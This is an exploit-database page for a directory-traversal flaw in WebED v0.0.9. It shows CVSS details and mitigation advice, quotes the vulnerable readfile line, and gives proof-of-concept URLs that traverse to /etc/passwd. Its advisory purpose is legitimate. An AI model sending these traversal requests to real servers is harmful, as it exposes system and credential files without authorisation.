header-logo
Suggest Exploit
vendor:
WebED
by:
Unknown
7.5
CVSS
HIGH
Remote File Disclosure
22
CWE
Product Name: WebED
Affected Version From: v0.0.9
Affected Version To: v0.0.9
Patch Exists: NO
Related CWE:
CPE: a:webed:webed:0.0.9
Metasploit:
Other Scripts:
Platforms Tested:
2007

WebED v0.0.9 (index.php) Remote File Disclosure Vulnerabilities

The vulnerability exists in the index.php file of WebED v0.0.9. The code in the file allows an attacker to read arbitrary files on the server by manipulating the 'Root' and 'Path' parameters in the URL. By including '../' in the parameters, an attacker can navigate to sensitive files such as '/etc/passwd'. This vulnerability can be exploited remotely.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a newer version of WebED or apply a patch provided by the vendor. Additionally, ensure that the 'Root' and 'Path' parameters are properly validated and sanitized to prevent directory traversal attacks.
Source

Exploit-DB raw data:

WebED v0.0.9 (index.php) Remote File Disclosure Vulnerabilities
Script : http://heanet.dl.sourceforge.net/sourceforge/ed-engine/WebED_v0.0.9.tar.gz
Vuln Code In /mod/chat/index.php :
<body>
 <?php readfile($Root.$Path); ?> <---[xxx]
 <form action="application_loader.php" method="post">
PoC :
     /mod/chat/index.php?Root=../../../../../../etc/passwd
     /mod/chat/index.php?Path=../../../../../../etc/pa

# milw0rm.com [2007-11-29]

Navigation

Suggest Exploit

Services By CQR